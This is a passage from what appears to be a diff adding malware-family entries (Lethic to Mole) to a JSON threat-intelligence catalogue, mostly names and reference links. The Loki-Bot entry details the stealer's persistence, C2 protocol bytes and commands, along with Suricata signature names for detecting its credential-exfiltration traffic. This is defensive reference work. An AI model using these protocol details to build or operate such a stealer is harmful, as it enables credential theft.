"https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", + "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/", + "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", + "http://www.malware-traffic-analysis.net/2017/11/02/index.html" + ] + }, + "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", + "value": "Lethic", + "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" + ] + }, + "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", + "value": "Limitail", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", + "value": "Listrix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", + "https://malware.news/t/recent-litehttp-activities-and-iocs/21053", + "https://github.com/zettabithf/LiteHTTP" + ] + }, + "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", + "value": "LiteHTTP", + "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", + "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", + "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", + "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", + "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" + ] + }, + "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", + "value": "Locky", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" + ] + }, + "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", + "value": "Locky (Decryptor)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" + ] + }, + "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", + "value": "Locky Loader", + "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", + "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", + "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", + "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" + ] + }, + "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", + "value": "LockPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nymeria" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", + "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", + "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" + ] + }, + "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", + "value": "Loda", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", + "value": "Logedrut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", + "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" + ] + }, + "uuid": "2789b246-d762-4d38-8cc8-302293e314da", + "value": "LogPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Loki", + "LokiPWS", + "LokiBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", + "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", + "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + "https://github.com/R3MRUM/loki-parse", + "http://www.malware-traffic-analysis.net/2017/06/12/index.html", + "http://blog.fernandodominguez.me/lokis-antis-analysis/", + "https://phishme.com/loki-bot-malware/", + "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", + "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", + "value": "Loki Password Stealer (PWS)", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", + "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", + "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", + "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", + "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", + "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/" + ] + }, + "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", + "value": "Luminosity RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", + "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" + ] + }, + "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", + "value": "Lurk", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" + ] + }, + "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", + "value": "Luzo", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Lucky Locker", + "Adneukine", + "Bomba Locker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", + "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", + "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", + "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" + ] + }, + "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", + "value": "Lyposit", + "description": "" + }, + { + "meta": { + "synonyms": [ + "El Machete" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", + "https://securelist.com/el-machete/66108/", + "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", + "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" + ] + }, + "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", + "value": "Machete", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", + "https://www.arbornetworks.com/blog/asert/mad-max-dga/" + ] + }, + "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", + "value": "MadMax", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", + "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" + ] + }, + "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", + "value": "Magala", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", + "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", + "https://www.youtube.com/watch?v=lqWJaaofNf4", + "http://asec.ahnlab.com/1124" + ] + }, + "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", + "value": "Magniber", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", + "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" + ] + }, + "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", + "value": "MajikPos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", + "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", + "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" + ] + }, + "uuid": "996e73e9-b093-4987-9992-f52008e55b24", + "value": "Makadocs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", + "https://twitter.com/James_inthe_box/status/1046844087469391872" + ] + }, + "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", + "value": "MakLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", + "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/", + "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", + "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" + ] + }, + "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", + "value": "Maktub", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", + "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" + ] + }, + "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", + "value": "MalumPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HDDCryptor", + "DiskCryptor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", + "https://securelist.com/the-return-of-mamba-ransomware/79403/" + ] + }, + "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", + "value": "Mamba", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CryptoHost" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", + "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", + "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" + ] + }, + "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", + "value": "ManameCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "junidor", + "mengkite", + "vedratve" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", + "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" + ] + }, + "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", + "value": "Mangzamel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", + "https://twitter.com/struppigel/status/811587154983981056" + ] + }, + "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", + "value": "Manifestus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", + "value": "ManItsMe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", + "value": "MAPIget", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" + ] + }, + "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", + "value": "Marap", + "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", + "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" + ] + }, + "uuid": "59717468-271e-4d15-859a-130681c17ddb", + "value": "Matrix Banker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom" + ] + }, + "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", + "value": "Matrix Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", + "http://www.clearskysec.com/tulip/" + ] + }, + "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", + "value": "Matryoshka RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", + "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" + ] + }, + "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", + "value": "Matsnu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DexLocker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", + "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", + "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", + "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", + "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html" + ] + }, + "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", + "value": "MBRlock", + "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts." + }, + { + "meta": { + "synonyms": [ + "MyBios" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", + "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", + "https://www.symantec.com/connect/blogs/bios-threat-showing-again", + "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", + "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/" + ] + }, + "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", + "value": "Mebromi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", + "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" + ] + }, + "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", + "value": "Medre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", + "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/", + "https://news.drweb.com/show/?i=10302&lng=en", + "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", + "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/" + ] + }, + "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", + "value": "win.medusa", + "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" + ] + }, + "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", + "value": "Mewsei", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", + "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" + ] + }, + "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", + "value": "Miancha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", + "value": "Micrass", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", + "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", + "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" + ] + }, + "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", + "value": "Microcin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" + ] + }, + "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", + "value": "Micropsia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" + ] + }, + "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", + "value": "Mikoponi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", + "value": "MILKMAID", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", + "https://github.com/gentilkiwi/mimikatz", + " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", + "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle" + ] + }, + "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", + "value": "MimiKatz", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", + "value": "MiniASP", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ] + }, + "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", + "value": "Mirage", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ] + }, + "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", + "value": "MirageFox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", + "https://twitter.com/PhysicalDrive0/status/830070569202749440", + "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", + "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html" + ] + }, + "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "value": "Mirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" + ] + }, + "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", + "value": "Misdat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "MixFox", + "ModPack" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" + ] + }, + "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", + "value": "Misfox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" + ] + }, + "uuid": "4c786624-4a55-46e6-849d-b65552034235", + "value": "Miuref", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", + "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + ] + }, + "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", + "value": "MM Core", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", + "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" + ] + }, + "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", + "value": "MobiRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" + ] + }, + "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", + "value": "Mocton", + "description": "" + }, + { + "meta": { + "synonyms": [ + "straxbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", + "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", + "https://twitter.com/physicaldrive0/status/670258429202530306" + ] + }, + "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", + "value": "ModPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", + "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", + "https://breakingmalware.com/malware/moker-part-2-capabilities/", + "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", + "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" + ] + }, + "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", + "value": "Moker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", + "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", + 